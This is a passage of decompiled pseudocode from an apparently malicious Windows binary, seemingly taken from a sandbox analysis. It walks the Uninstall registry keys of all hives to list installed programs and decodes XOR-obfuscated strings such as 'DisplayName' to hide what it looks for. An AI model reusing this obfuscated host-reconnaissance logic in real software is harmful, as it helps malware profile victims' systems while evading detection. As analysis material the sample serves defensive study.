				_t938 =  >=  ?  *0x24a8c0 : 0x24a8c0;
				_t525 = E001F5C6D();
				_push(_t761);
				_t882 =  >=  ?  *0x24a8c0 : 0x24a8c0;
				E001F91AD(0, _t947 - 0x1fc,  *0x24a8d4 - 0x10, L001F57CC(_t525,  >=  ?  *0x24a8c0 : 0x24a8c0), 0xa); // executed
				asm("movaps xmm0, [0x23da00]");
				_t764 = 0;
				asm("movups [ebp-0xb2], xmm0");
				 *((short*)(_t947 - 0xa2)) = 0x38;
				do {
					 *(_t947 + _t764 - 0xb1) =  *(_t947 + _t764 - 0xb1) ^  *(_t947 - 0xb2);
					_t764 = _t764 + 1;
				} while (_t764 < 0x10);
				 *((char*)(_t947 - 0xa1)) = 0;
				E001D3B98(_t947 - 0x1ec, _t947 - 0xb1); // executed
				E001D3D59(0x24a6f8);
				 *(_t947 - 0x64) = 0;
				 *(_t947 - 0x60) = 0;
				 *(_t947 - 0x84) = 0;
				 *(_t947 - 0x80) = 0;
				 *(_t947 - 0x6c) = 0;
				 *(_t947 - 0x88) = 0;
				 *(_t947 - 0x68) = 0xf003f;
				 *(_t947 - 0x18) = 0;
				 *(_t947 - 0xbc) = 0;
				_t533 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019, _t947 - 0x64); // executed
				if(_t533 == 0) {
					_t939 = 0;
					 *(_t947 - 0x10c) = 0x18;
					do {
						 *(_t947 - 0x18) = 0x800;
						_t537 = RegEnumKeyExW( *(_t947 - 0x64), _t939, _t947 - 0x11fc, _t947 - 0x18, 0, 0, 0, 0); // executed
						_t928 = _t537;
						__eflags = _t928;
						if(_t928 != 0) {
							goto L36;
						}
						wsprintfW(_t947 - 0x9fc, L"%s\\%s", L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t947 - 0x11fc);
						_t949 = _t949 + 0x10;
						_t702 = RegOpenKeyExW(0x80000002, _t947 - 0x9fc, _t928, 0x20019, _t947 - 0x60); // executed
						__eflags = _t702;
						if(_t702 != 0) {
							RegCloseKey( *(_t947 - 0x60));
							RegCloseKey( *(_t947 - 0x64));
							L39:
							RegCloseKey( *(_t947 - 0x64));
							_t540 = RegOpenKeyExW(0x80000001, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019, _t947 - 0x64); // executed
							__eflags = _t540;
							if(_t540 != 0) {
								L77:
								_t748 = 0;
								__eflags = 0;
								L78:
								 *((char*)(_t947 - 0xc0)) = _t748;
								L79:
								E001F91FB(_t947 - 0x184);
								 *((char*)(_t947 - 4)) = 0x11;
								 *((intOrPtr*)(_t947 - 0x184)) = 0x239538;
								E001FFA32(_t947 - 0x184);
								E001D2CDA();
								 *[fs:0x0] =  *((intOrPtr*)(_t947 - 0xc));
								return  *((intOrPtr*)(_t947 - 0xc0));
							}
							_t941 = 0;
							__eflags = 0;
							do {
								 *(_t947 - 0x18) = 0x800;
								_t548 = RegEnumKeyExW( *(_t947 - 0x64), _t941, _t947 - 0x11fc, _t947 - 0x18, 0, 0, 0, 0); // executed
								_t930 = _t548;
								__eflags = _t930;
								if(_t930 != 0) {
									goto L72;
								}
								wsprintfW(_t947 - 0x9fc, L"%s\\%s", L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t947 - 0x11fc);
								_t949 = _t949 + 0x10;
								_t654 = RegOpenKeyExW(0x80000001, _t947 - 0x9fc, _t930, 0x20019, _t947 - 0x60);
								__eflags = _t654;
								if(_t654 != 0) {
									RegCloseKey( *(_t947 - 0x60));
									RegCloseKey( *(_t947 - 0x64));
									L75:
									RegCloseKey( *(_t947 - 0x64));
									_t551 = RegOpenKeyExW(0x80000003, 0x23d410, 0, 0x20019, _t947 - 0x84); // executed
									__eflags = _t551;
									if(_t551 == 0) {
										_t932 = 1;
										__eflags = 1;
										 *(_t947 - 0x70) = 1;
										do {
											 *(_t947 - 0x18) = 0x800;
											_t555 = RegEnumKeyExW( *(_t947 - 0x84), _t932, _t947 - 0x11fc, _t947 - 0x18, 0, 0, 0, 0); // executed
											_t751 = _t555;
											 *(_t947 - 0x34) = _t751;
											__eflags = _t751;
											if(_t751 != 0) {
												goto L119;
											}
											wsprintfW(_t947 - 0x9fc, L"%s\\%s", _t947 - 0x11fc, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall");
											_t949 = _t949 + 0x10;
											_t594 = RegOpenKeyExW(0x80000003, _t947 - 0x9fc, _t751, 0x20019, _t947 - 0x80); // executed
											__eflags = _t594;
											if(_t594 != 0) {
												L118:
												RegCloseKey( *(_t947 - 0x80));
												goto L119;
											}
											_t946 = 0;
											__eflags =  *(_t947 - 0x88);
											if( *(_t947 - 0x88) != 0) {
												goto L118;
											} else {
												goto L84;
											}
											do {
												L84:
												 *(_t947 - 0xbc) = 0x800;
												_t598 = RegEnumKeyExW( *(_t947 - 0x80), _t946, _t947 - 0x29fc, _t947 - 0xbc, _t751, _t751, _t751, _t751); // executed
												_t935 = _t598;
												 *(_t947 - 0x88) = _t935;
												__eflags = _t935;
												if(_t935 != 0) {
													goto L116;
												}
												wsprintfW(_t947 - 0x31fc, L"%s\\%s", _t947 - 0x9fc, _t947 - 0x29fc);
												_t949 = _t949 + 0x10;
												_t605 = RegOpenKeyExW(0x80000003, _t947 - 0x31fc, _t751, 0x20019, _t947 - 0x6c);
												__eflags = _t605;
												if(_t605 == 0) {
													 *(_t947 - 0x108) = _t751;
													 *(_t947 - 0xf8) = _t751;
													 *(_t947 - 0xf4) = 0xf;
													 *(_t947 - 0x108) = _t751;
													 *((char*)(_t947 - 4)) = 0xd;
													_t795 = 0x54;
													 *(_t947 - 0x18) = 0x800;
													_t901 = _t751;
													 *((intOrPtr*)(_t947 - 0x59)) = 0x273d1054;
													 *((intOrPtr*)(_t947 - 0x55)) = 0x2d353824;
													 *((intOrPtr*)(_t947 - 0x51)) = 0x3139351a;
													 *(_t947 - 0x4d) = _t751;
													while(1) {
														 *(_t947 + _t901 - 0x58) =  *(_t947 + _t901 - 0x58) ^ _t795;
														_t901 =  &(_t901[0]);
														__eflags = _t901 - 0xb;
														if(_t901 >= 0xb) {
															break;
														}
														_t795 =  *((intOrPtr*)(_t947 - 0x59));
													}
													 *(_t947 - 0x4d) = _t751;
													_t610 = RegQueryValueExA( *(_t947 - 0x6c), _t947 - 0x58, _t751, _t947 - 0x68, _t947 - 0x19fc, _t947 - 0x18);
													__eflags = _t610;
													if(_t610 != 0) {
														L115:
														RegCloseKey( *(_t947 - 0x6c));
														 *((char*)(_t947 - 4)) = 1;
														E001D2F2D(_t947 - 0x108);
														_t751 = 0;
														__eflags = 0;
														goto L116;
													}
													 *(_t947 - 0xa0) =  *(_t947 - 0xa0) & _t610;
													 *(_t947 - 0x90) =  *(_t947 - 0x90) & _t610;
													 *(_t947 - 0x8c) = 0xf;
													L001D2F8E(_t947 - 0x19fc);
													E001D2F2D(_t947 - 0x108);
													E001D3096(_t947 - 0x108, _t947 - 0xa0);
													E001D2F2D(_t947 - 0xa0);
													_t902 = 0x4a;
													 *((intOrPtr*)(_t947 - 0x4a)) = 0x2923074a;
													 *((intOrPtr*)(_t947 - 0x46)) = 0x25392538;
													_t801 = 0;
													__eflags = 0;
													 *((short*)(_t947 - 0x42)) = 0x3e2c;
													 *(_t947 - 0x40) = 0;
													while(1) {
														 *(_t947 + _t801 - 0x49) =  *(_t947 + _t801 - 0x49) ^ _t902;
														_t801 = _t801 + 1;
														__eflags = _t801 - 9;
														if(_t801 >= 9) {
															break;
														}
														_t902 =  *((intOrPtr*)(_t947 - 0x4a));
													}
													_push(_t801);
													 *(_t947 - 0x40) = 0;
													_t620 = E001D237C(_t947 - 0x108, _t947 - 0x49);
													__eflags = _t620 - 0xffffffff;
													if(_t620 != 0xffffffff) {
														L103:
														_t903 = 0x2b;
														 *((intOrPtr*)(_t947 - 0x1e)) = 0x4c4f6e2b;
														 *((short*)(_t947 - 0x1a)) = 0x4e;
														_t803 = 0;
														__eflags = 0;
														while(1) {
															 *(_t947 + _t803 - 0x1d) =  *(_t947 + _t803 - 0x1d) ^ _t903;
															_t803 = _t803 + 1;
															__eflags = _t803 - 4;
															if(_t803 >= 4) {
																break;
															}
															_t400 = _t947 - 0x1e; // 0x4c4f6e2b
															_t903 =  *_t400;
														}
														_push(_t803);
														 *((char*)(_t947 - 0x19)) = 0;
														_t622 = E001D237C(_t947 - 0x108, _t947 - 0x1d);
														__eflags = _t622 - 0xffffffff;
														if(_t622 == 0xffffffff) {
															goto L115;
														}
														L107:
														asm("movaps xmm0, [0x23d820]");
														_t805 = 0;
														 *(_t947 - 0x18) = 0x800;
														asm("movups [ebp-0xb0], xmm0");
														do {
															 *(_t947 + _t805 - 0xaf) =  *(_t947 + _t805 - 0xaf) ^  *(_t947 - 0xb0);
															_t805 = _t805 + 1;
															__eflags = _t805 - 0xe;
														} while (_t805 < 0xe);
														 *((char*)(_t947 - 0xa1)) = 0;
														_t629 = RegQueryValueExA( *(_t947 - 0x6c), _t947 - 0xaf, 0, _t947 - 0x68, _t947 - 0x21fc, _t947 - 0x18);
														__eflags = _t629;
														if(_t629 != 0) {
															L114:
															E001F2D58(_t947 - 0x7c, _t947 - 0x108);
															goto L115;
														}
														 *(_t947 - 0x8c) = 0xf;
														 *((char*)(_t947 - 0x13)) = 0x73;
														__eflags = 0;
														 *((char*)(_t947 - 0x12)) = 0x5a;
														 *(_t947 - 0xa0) = 0;
														 *((char*)(_t947 - 0x11)) = 0;
														 *(_t947 - 0x90) = 0;
														 *(_t947 - 0xa0) = 0;
														L001D2F8E(_t947 - 0x21fc);
														 *((char*)(_t947 - 4)) = 0xe;
														_t904 = 0x65;
														 *(_t947 - 0x10) = 0x4d4565;
														_t809 = 0;
														while(1) {
															 *(_t947 + _t809 - 0xf) =  *(_t947 + _t809 - 0xf) ^ _t904;
															_t809 = _t809 + 1;
															__eflags = _t809 - 2;
															if(_t809 >= 2) {
																break;
															}
															_t431 = _t947 - 0x10; // 0x4d4565
															_t904 =  *_t431;
														}
														 *((char*)(_t947 - 0xd)) = 0;
														_t637 = E001DC2AE(_t947 - 0x13c, _t947 - 0xf, _t947 - 0xa0);
														 *((char*)(_t947 - 4)) = 0xf;
														_t638 = E001DC2EA(_t947 - 0x124, _t637, _t947 - 0x12);
														 *((char*)(_t947 - 4)) = 0x10;
														E001D24B1(_t638);
														E001D2F2D(_t947 - 0x124);
														E001D2F2D(_t947 - 0x13c);
														 *((char*)(_t947 - 4)) = 0xd;
														E001D2F2D(_t947 - 0xa0);
														goto L114;
													}
													_t907 = 0x6f;
													 *((intOrPtr*)(_t947 - 0x28)) = 0x1c06396f;
													 *((intOrPtr*)(_t947 - 0x24)) = 0x30e1a;
													_t819 = 0;
													__eflags = 0;
													while(1) {
														 *(_t947 + _t819 - 0x27) =  *(_t947 + _t819 - 0x27) ^ _t907;
														_t819 = _t819 + 1;
														__eflags = _t819 - 6;
														if(_t819 >= 6) {
															break;
														}
														_t907 =  *((intOrPtr*)(_t947 - 0x28));
													}
													_push(_t819);
													 *((char*)(_t947 - 0x21)) = 0;
													_t644 = E001D237C(_t947 - 0x108, _t947 - 0x27);
													__eflags = _t644 - 0xffffffff;
													if(_t644 != 0xffffffff) {
														goto L103;
													}
													_t908 = 0x4b;
													 *((intOrPtr*)(_t947 - 0x3d)) = 0x25221c4b;
													 *((intOrPtr*)(_t947 - 0x39)) = 0x383c242f;
													_t821 = 0;
													__eflags = 0;
													 *((char*)(_t947 - 0x35)) = 0;
													while(1) {
														 *(_t947 + _t821 - 0x3c) =  *(_t947 + _t821 - 0x3c) ^ _t908;
														_t821 = _t821 + 1;
														__eflags = _t821 - 7;
														if(_t821 >= 7) {
															break;
														}
														_t908 =  *((intOrPtr*)(_t947 - 0x3d));
													}
													_push(_t821);
													 *((char*)(_t947 - 0x35)) = 0;
													_t646 = E001D237C(_t947 - 0x108, _t947 - 0x3c);
													__eflags = _t646 - 0xffffffff;
													if(_t646 == 0xffffffff) {
														goto L107;
													}
													goto L103;
												}
												RegCloseKey( *(_t947 - 0x6c));
												L116:
												_t946 = _t946 + 1;
												__eflags = _t935;
											} while (_t935 == 0);
											_t932 =  *(_t947 - 0x70);
											_t751 =  *(_t947 - 0x34);
											goto L118;
											L119:
											_t932 = _t932 + 1;
											 *(_t947 - 0x70) = _t932;
											__eflags = _t751;
										} while (_t751 == 0);
										_t942 =  *(_t947 - 0x78);
										_t933 =  *(_t947 - 0x7c);
										_t771 = 0x18;
										asm("cdq");
										 *((char*)(_t947 - 0x32)) = 0;
										 *(_t947 - 0x88) = (_t942 - _t933) / _t771;
										E001FAB19(_t933, _t942, (_t942 - _t933) / _t771,  *((intOrPtr*)(_t947 - 0x32)));
										__eflags = _t933 - _t942;
										if(_t933 == _t942) {
											L125:
											_t560 = _t942;
											L126:
											_t752 =  *(_t947 - 0x88);
											_t775 = 0x18;
											asm("cdq");
											_t776 = (_t560 - _t933) / _t775;
											__eflags = _t776 - _t752;
											if(__eflags >= 0) {
												if(__eflags <= 0) {
													L144:
													_t753 = 0;
													asm("cdq");
													_t777 = 0x18;
													_t944 = (_t942 - _t933) / _t777;
													__eflags = _t944;
													if(_t944 == 0) {
														L146:
														_t565 = E001D3D59(0x24a6f8);
														_t890 = 0x27;
														_t945 = _t565;
														 *(_t947 - 0x5b) = _t890;
														 *((intOrPtr*)(_t947 - 0x5a)) = 0xa0a0a0a;
														_t779 = 0;
														__eflags = 0;
														 *((intOrPtr*)(_t947 - 0x56)) = 0xa0a0a0a;
														 *((intOrPtr*)(_t947 - 0x52)) = 0xa0a0a0a;
														 *((short*)(_t947 - 0x4e)) = 0xa;
														while(1) {
															 *(_t947 + _t779 - 0x5a) =  *(_t947 + _t779 - 0x5a) ^ _t890;
															_t779 = _t779 + 1;
															__eflags = _t779 - 0xd;
															if(_t779 >= 0xd) {
																break;
															}
															_t890 =  *(_t947 - 0x5b);
														}
														_t514 = _t947 - 0x5a; // 0xa0a0a0a
														 *(_t947 - 0x4d) = 0;
														E001D3B98(_t945, _t514);
														E001D3D59(0x24a6f8);
														E001D3D59(0x24a6f8);
														E001F917D(_t947 - 0x1fc);
														RegCloseKey( *(_t947 - 0x84));
														goto L79;
													} else {
														goto L145;
													}
													do {
														L145:
														 *((char*)(_t947 - 0x11)) = 0;
														 *((char*)(_t947 - 0x13)) = 0x6b;
														 *((char*)(_t947 - 0x12)) = 9;
														 *((char*)(_t947 - 0x11)) = 0;
														E001D3B98(_t947 - 0x1ec, _t947 - 0x12);
														E001D3D59(_t933);
														E001D3D59(0x24a6f8);
														_t576 = 0x18;
														_t753 = _t753 + 1;
														_t933 = _t933 + _t576;
														__eflags = _t753 - _t944;
													} while (_t753 < _t944);
													goto L146;
												}
												_t578 =  *((intOrPtr*)(_t947 - 0x74)) - _t933;
												asm("cdq");
												__eflags = _t776 - _t578 /  *(_t947 - 0x10c);
												if(_t776 <= _t578 /  *(_t947 - 0x10c)) {
													_t787 = _t776 - _t752;
													__eflags = _t787;
													if(_t787 == 0) {
														L143:
														 *(_t947 - 0x78) = _t942;
														goto L144;
													}
													_t580 = 0x18;
													do {
														 *_t942 =  *_t942 & 0x00000000;
														_t942[4] = _t942[4] & 0x00000000;
														_t942[5] = 0xf;
														_t942 = _t942 + _t580;
														_t787 = _t787 - 1;
														__eflags = _t787;
													} while (_t787 != 0);
													goto L143;
												}
												E001FAA5A(_t752, _t947 - 0x7c, _t776, _t776);
												_t942 =  *(_t947 - 0x78);
												_t933 =  *(_t947 - 0x7c);
												goto L144;
											}
											_t756 = _t776 * 0x18 + _t933;
											__eflags = _t756 - _t942;
											if(_t756 == _t942) {
												L131:
												_t942 = _t756;
												goto L143;
											}
											_t934 = _t756;
											do {
												E001D2F2D(_t934);
												_t583 = 0x18;
												_t934 = _t934 + _t583;
												__eflags = _t934 - _t942;
											} while (_t934 != _t942);
											_t933 =  *(_t947 - 0x7c);
											goto L131;
										}
										_t757 = _t933;
										_t898 = _t757 + 0x18;
										 *(_t947 - 0x70) = _t898;
										while(1) {
											__eflags = _t898 - _t942;
											if(_t898 == _t942) {
												goto L125;
											}
											_t584 = E001D3D28(_t757, _t898, _t942);
											_t899 =  *(_t947 - 0x70);
											_t791 = _t899 + 0x18;
											 *(_t947 - 0x10) = _t791;
											__eflags = _t584;
											if(_t584 != 0) {
												while(1) {
													__eflags = _t791 - _t942;
													if(_t791 == _t942) {
														break;
													}
													_t585 = E001D3D28(_t757, _t791, _t942);
													__eflags = _t585;
													if(_t585 == 0) {
														_t587 = 0x18;
														_t757 = _t757 + _t587;
														__eflags = _t757;
														E001D2503(_t757,  *(_t947 - 0x10));
													}
													_t586 = 0x18;
													_t791 =  *(_t947 - 0x10) + _t586;
													__eflags = _t791;
													 *(_t947 - 0x10) = _t791;
												}
												_t560 = _t757 + 0x18;
												goto L126;
											}
											_t757 = _t899;
											 *(_t947 - 0x70) = _t791;
											_t898 = _t791;
										}
										goto L125;
									}
									RegCloseKey( *(_t947 - 0x84));
									goto L77;
								}
								 *(_t947 - 0xf0) = _t654;
								 *(_t947 - 0xe0) = _t654;
								 *(_t947 - 0xdc) = 0xf;
								 *(_t947 - 0xf0) = _t654;
								 *((char*)(_t947 - 4)) = 8;
								_t909 = 0x21;
								 *(_t947 - 0x18) = 0x800;
								_t823 = _t654;
								 *((intOrPtr*)(_t947 - 0x4c)) = 0x52486521;
								 *((intOrPtr*)(_t947 - 0x48)) = 0x58404d51;
								 *((intOrPtr*)(_t947 - 0x44)) = 0x444c406f;
								 *(_t947 - 0x40) = _t654;
								while(1) {
									 *(_t947 + _t823 - 0x4b) =  *(_t947 + _t823 - 0x4b) ^ _t909;
									_t823 = _t823 + 1;
									__eflags = _t823 - 0xb;
									if(_t823 >= 0xb) {
										break;
									}
									_t187 = _t947 - 0x4c; // 0x52486521
									_t909 =  *_t187;
								}
								 *(_t947 - 0x40) = 0;
								_t661 = RegQueryValueExA( *(_t947 - 0x60), _t947 - 0x4b, 0, _t947 - 0x68, _t947 - 0x19fc, _t947 - 0x18);
								__eflags = _t661;
								if(_t661 != 0) {
									L71:
									RegCloseKey( *(_t947 - 0x60));
									 *((char*)(_t947 - 4)) = 1;
									E001D2F2D(_t947 - 0xf0);
									goto L72;
								}
								 *(_t947 - 0xa0) =  *(_t947 - 0xa0) & _t661;
								 *(_t947 - 0x90) =  *(_t947 - 0x90) & _t661;
								 *(_t947 - 0x8c) = 0xf;
								L001D2F8E(_t947 - 0x19fc);
								E001D2F2D(_t947 - 0xf0);
								E001D3096(_t947 - 0xf0, _t947 - 0xa0);
								E001D2F2D(_t947 - 0xa0);
								__eflags = 0;
								 *((intOrPtr*)(_t947 - 0x3f)) = 0xc06226f;
								_t910 = 0x6f;
								 *((intOrPtr*)(_t947 - 0x3b)) = 0x1c001d;
								 *((short*)(_t947 - 0x37)) = 0x1b09;
								_t829 = 0;
								 *((char*)(_t947 - 0x35)) = 0;
								while(1) {
									 *(_t947 + _t829 - 0x3e) =  *(_t947 + _t829 - 0x3e) ^ _t910;
									_t829 = _t829 + 1;
									__eflags = _t829 - 9;
									if(_t829 >= 9) {
										break;
									}
									_t910 =  *((intOrPtr*)(_t947 - 0x3f));
								}
								 *((char*)(_t947 - 0x35)) = 0;
								_push(_t829);
								_t672 = E001D237C(_t947 - 0xf0, _t947 - 0x3e);
								__eflags = _t672 - 0xffffffff;
								if(_t672 != 0xffffffff) {
									L59:
									_t911 = 0x56;
									 *(_t947 - 0x34) = 0x31321356;
									 *((short*)(_t947 - 0x30)) = 0x33;
									_t831 = 0;
									__eflags = 0;
									while(1) {
										 *(_t947 + _t831 - 0x33) =  *(_t947 + _t831 - 0x33) ^ _t911;
										_t831 = _t831 + 1;
										__eflags = _t831 - 4;
										if(_t831 >= 4) {
											break;
										}
										_t911 =  *(_t947 - 0x34);
									}
									_push(_t831);
									 *((char*)(_t947 - 0x2f)) = 0;
									_t674 = E001D237C(_t947 - 0xf0, _t947 - 0x33);
									__eflags = _t674 - 0xffffffff;
									if(_t674 == 0xffffffff) {
										goto L71;
									}
									L63:
									asm("movaps xmm0, [0x23d7f0]");
									_t912 = 0;
									 *(_t947 - 0x18) = 0x800;
									asm("movups [ebp-0x5c], xmm0");
									do {
										 *(_t947 + _t912 - 0x5b) =  *(_t947 + _t912 - 0x5b) ^  *(_t947 - 0x5c);
										_t912 = _t912 + 1;
										__eflags = _t912 - 0xe;
									} while (_t912 < 0xe);
									 *(_t947 - 0x4d) = 0;
									_t679 = RegQueryValueExA( *(_t947 - 0x60), _t947 - 0x5b, 0, _t947 - 0x68, _t947 - 0x21fc, _t947 - 0x18);
									__eflags = _t679;
									if(_t679 != 0) {
										L70:
										E001F2D58(_t947 - 0x7c, _t947 - 0xf0);
										goto L71;
									}
									 *((char*)(_t947 - 0x13)) = 0x2d;
									 *((intOrPtr*)(_t947 - 0xb8)) = 0;
									 *((char*)(_t947 - 0x11)) = 0;
									 *((char*)(_t947 - 0x12)) = 4;
									 *((intOrPtr*)(_t947 - 0xa8)) = 0;
									 *((char*)(_t947 - 0xb8)) = 0;
									 *(_t947 - 0xa4) = 0xf;
									L001D2F8E(_t947 - 0x21fc);
									 *((char*)(_t947 - 4)) = 9;
									_t837 = 0x10;
									 *(_t947 - 0x10) = 0x383010;
									_t913 = 0;
									__eflags = 0;
									while(1) {
										 *(_t947 + _t913 - 0xf) =  *(_t947 + _t913 - 0xf) ^ _t837;
										_t913 = _t913 + 1;
										__eflags = _t913 - 2;
										if(_t913 >= 2) {
											break;
										}
										_t837 =  *(_t947 - 0x10);
									}
									 *((char*)(_t947 - 0xd)) = 0;
									_t687 = E001DC2AE(_t947 - 0xa0, _t947 - 0xf, _t947 - 0xb8);
									 *((char*)(_t947 - 4)) = 0xa;
									_t688 = E001DC2EA(_t947 - 0x124, _t687, _t947 - 0x12);
									 *((char*)(_t947 - 4)) = 0xb;
									E001D24B1(_t688);
									E001D2F2D(_t947 - 0x124);
									E001D2F2D(_t947 - 0xa0);
									 *((char*)(_t947 - 4)) = 8;
									E001D2F2D(_t947 - 0xb8);
									goto L70;
								}
								_t916 = 0x3a;
								 *((intOrPtr*)(_t947 - 0x20)) = 0x49536c3a;
								 *((intOrPtr*)(_t947 - 0x1c)) = 0x565b4f;
								_t847 = 0;
								__eflags = 0;
								while(1) {
									 *(_t947 + _t847 - 0x1f) =  *(_t947 + _t847 - 0x1f) ^ _t916;
									_t847 = _t847 + 1;
									__eflags = _t847 - 6;
									if(_t847 >= 6) {
										break;
									}
									_t223 = _t947 - 0x20; // 0x49536c3a
									_t916 =  *_t223;
								}
								_push(_t847);
								 *((char*)(_t947 - 0x19)) = 0;
								_t694 = E001D237C(_t947 - 0xf0, _t947 - 0x1f);
								__eflags = _t694 - 0xffffffff;
								if(_t694 != 0xffffffff) {
									goto L59;
								}
								_t917 = 0xf;
								 *((intOrPtr*)(_t947 - 0x29)) = 0x6166580f;
								 *((intOrPtr*)(_t947 - 0x25)) = 0x7c78606b;
								_t849 = 0;
								__eflags = 0;
								 *((char*)(_t947 - 0x21)) = 0;
								while(1) {
									 *(_t947 + _t849 - 0x28) =  *(_t947 + _t849 - 0x28) ^ _t917;
									_t849 = _t849 + 1;
									__eflags = _t849 - 7;
									if(_t849 >= 7) {
										break;
									}
									_t917 =  *((intOrPtr*)(_t947 - 0x29));
								}
								_push(_t849);
								 *((char*)(_t947 - 0x21)) = 0;
								_t696 = E001D237C(_t947 - 0xf0, _t947 - 0x28);
								__eflags = _t696 - 0xffffffff;
								if(_t696 == 0xffffffff) {
									goto L63;
								}
								goto L59;
								L72:
								_t941 = _t941 + 1;
								__eflags = _t930;
							} while (_t930 == 0);
							goto L75;
						}
						 *(_t947 - 0xd8) = _t702;
						 *(_t947 - 0xc8) = _t702;
						 *(_t947 - 0xc4) = 0xf;
						 *(_t947 - 0xd8) = _t702;
						 *((char*)(_t947 - 4)) = 3;
						_t918 = 0x15;
						 *(_t947 - 0x18) = 0x800;
						_t851 = _t702;
						 *((intOrPtr*)(_t947 - 0x4c)) = 0x667c5115;
						 *((intOrPtr*)(_t947 - 0x48)) = 0x6c747965;
						 *((intOrPtr*)(_t947 - 0x44)) = 0x7078745b;
						 *(_t947 - 0x40) = _t702;
						while(1) {
							 *(_t947 + _t851 - 0x4b) =  *(_t947 + _t851 - 0x4b) ^ _t918;
							_t851 = _t851 + 1;
							__eflags = _t851 - 0xb;
							if(_t851 >= 0xb) {
								break;
							}
							_t918 =  *((intOrPtr*)(_t947 - 0x4c));
						}
						 *(_t947 - 0x40) = 0;
						_t709 = RegQueryValueExA( *(_t947 - 0x60), _t947 - 0x4b, 0, _t947 - 0x68, _t947 - 0x19fc, _t947 - 0x18); // executed
						__eflags = _t709;
						if(_t709 != 0) {
							L35:
							RegCloseKey( *(_t947 - 0x60));
							 *((char*)(_t947 - 4)) = 1;
							E001D2F2D(_t947 - 0xd8);
							goto L36;
						}
						 *(_t947 - 0xa0) =  *(_t947 - 0xa0) & _t709;
						 *(_t947 - 0x90) =  *(_t947 - 0x90) & _t709;
						 *(_t947 - 0x8c) = 0xf;
						L001D2F8E(_t947 - 0x19fc);
						E001D2F2D(_t947 - 0xd8);
						E001D3096(_t947 - 0xd8, _t947 - 0xa0);
						E001D2F2D(_t947 - 0xa0);
						__eflags = 0;
						 *((intOrPtr*)(_t947 - 0x3f)) = 0xc06226f;
						_t919 = 0x6f;
						 *((intOrPtr*)(_t947 - 0x3b)) = 0x1c001d;
						 *((short*)(_t947 - 0x37)) = 0x1b09;
						_t857 = 0;
						 *((char*)(_t947 - 0x35)) = 0;
						while(1) {
							 *(_t947 + _t857 - 0x3e) =  *(_t947 + _t857 - 0x3e) ^ _t919;
							_t857 = _t857 + 1;
							__eflags = _t857 - 9;
							if(_t857 >= 9) {
								break;
							}
							_t919 =  *((intOrPtr*)(_t947 - 0x3f));
						}
						 *((char*)(_t947 - 0x35)) = 0;
						_push(_t857);
						_t720 = E001D237C(_t947 - 0xd8, _t947 - 0x3e);
						__eflags = _t720 - 0xffffffff;
						if(_t720 != 0xffffffff) {
							L23:
							_t721 = 0x18;
							_t859 = 0x7c;
							 *(_t947 - 0x34) = 0x397c;
							 *((char*)(_t947 - 0x32)) = _t721;
							_t920 = 0;
							__eflags = 0;
							 *((short*)(_t947 - 0x31)) = 0x191b;
							 *((char*)(_t947 - 0x2f)) = 0;
							while(1) {
								_t860 = _t859 ^  *(_t947 + _t920 - 0x33);
								 *(_t947 + _t920 - 0x33) = _t860;
								_t920 = _t920 + 1;
								__eflags = _t920 - 4;
								if(_t920 >= 4) {
									break;
								}
								_t859 =  *(_t947 - 0x34);
							}
							_push(_t860);
							 *((char*)(_t947 - 0x2f)) = 0;
							_t723 = E001D237C(_t947 - 0xd8, _t947 - 0x33);
							__eflags = _t723 - 0xffffffff;
							if(_t723 == 0xffffffff) {
								goto L35;
							}
							L27:
							asm("movaps xmm0, [0x23d7c0]");
							_t921 = 0;
							 *(_t947 - 0x18) = 0x800;
							asm("movups [ebp-0x5c], xmm0");
							do {
								 *(_t947 + _t921 - 0x5b) =  *(_t947 + _t921 - 0x5b) ^  *(_t947 - 0x5c);
								_t921 = _t921 + 1;
								__eflags = _t921 - 0xe;
							} while (_t921 < 0xe);
							 *(_t947 - 0x4d) = 0;
							_t728 = RegQueryValueExA( *(_t947 - 0x60), _t947 - 0x5b, 0, _t947 - 0x68, _t947 - 0x21fc, _t947 - 0x18); // executed
							__eflags = _t728;
							if(_t728 != 0) {
								L34:
								E001F2D58(_t947 - 0x7c, _t947 - 0xd8);
								goto L35;
							}
							 *((char*)(_t947 - 0x13)) = 0x44;
							 *((intOrPtr*)(_t947 - 0xb8)) = 0;
							 *((char*)(_t947 - 0x11)) = 0;
							 *((char*)(_t947 - 0x12)) = 0x6d;
							 *((intOrPtr*)(_t947 - 0xa8)) = 0;
							 *((char*)(_t947 - 0xb8)) = 0;
							 *(_t947 - 0xa4) = 0xf;
							L001D2F8E(_t947 - 0x21fc);
							 *((char*)(_t947 - 4)) = 4;
							_t922 = 0x6b;
							 *(_t947 - 0x10) = 0x434b6b;
							_t866 = 0;
							__eflags = 0;
							while(1) {
								 *(_t947 + _t866 - 0xf) =  *(_t947 + _t866 - 0xf) ^ _t922;
								_t866 = _t866 + 1;
								__eflags = _t866 - 2;
								if(_t866 >= 2) {
									break;
								}
								_t142 = _t947 - 0x10; // 0x434b6b
								_t922 =  *_t142;
							}
							 *((char*)(_t947 - 0xd)) = 0;
							_t736 = E001DC2AE(_t947 - 0x124, _t947 - 0xf, _t947 - 0xb8);
							 *((char*)(_t947 - 4)) = 5;
							_t737 = E001DC2EA(_t947 - 0xa0, _t736, _t947 - 0x12);
							 *((char*)(_t947 - 4)) = 6;
							E001D24B1(_t737);
							E001D2F2D(_t947 - 0xa0);
							E001D2F2D(_t947 - 0x124);
							 *((char*)(_t947 - 4)) = 3;
							E001D2F2D(_t947 - 0xb8);
							goto L34;
						}
						_t925 = 0x36;
						 *((intOrPtr*)(_t947 - 0x20)) = 0x455f6036;
						 *((intOrPtr*)(_t947 - 0x1c)) = 0x5a5743;
						_t876 = 0;
						__eflags = 0;
						while(1) {
							 *(_t947 + _t876 - 0x1f) =  *(_t947 + _t876 - 0x1f) ^ _t925;
							_t876 = _t876 + 1;
							__eflags = _t876 - 6;
							if(_t876 >= 6) {
								break;
							}
							_t88 = _t947 - 0x20; // 0x455f6036
							_t925 =  *_t88;
						}
						_push(_t876);
						 *((char*)(_t947 - 0x19)) = 0;
						_t743 = E001D237C(_t947 - 0xd8, _t947 - 0x1f);
						__eflags = _t743 - 0xffffffff;
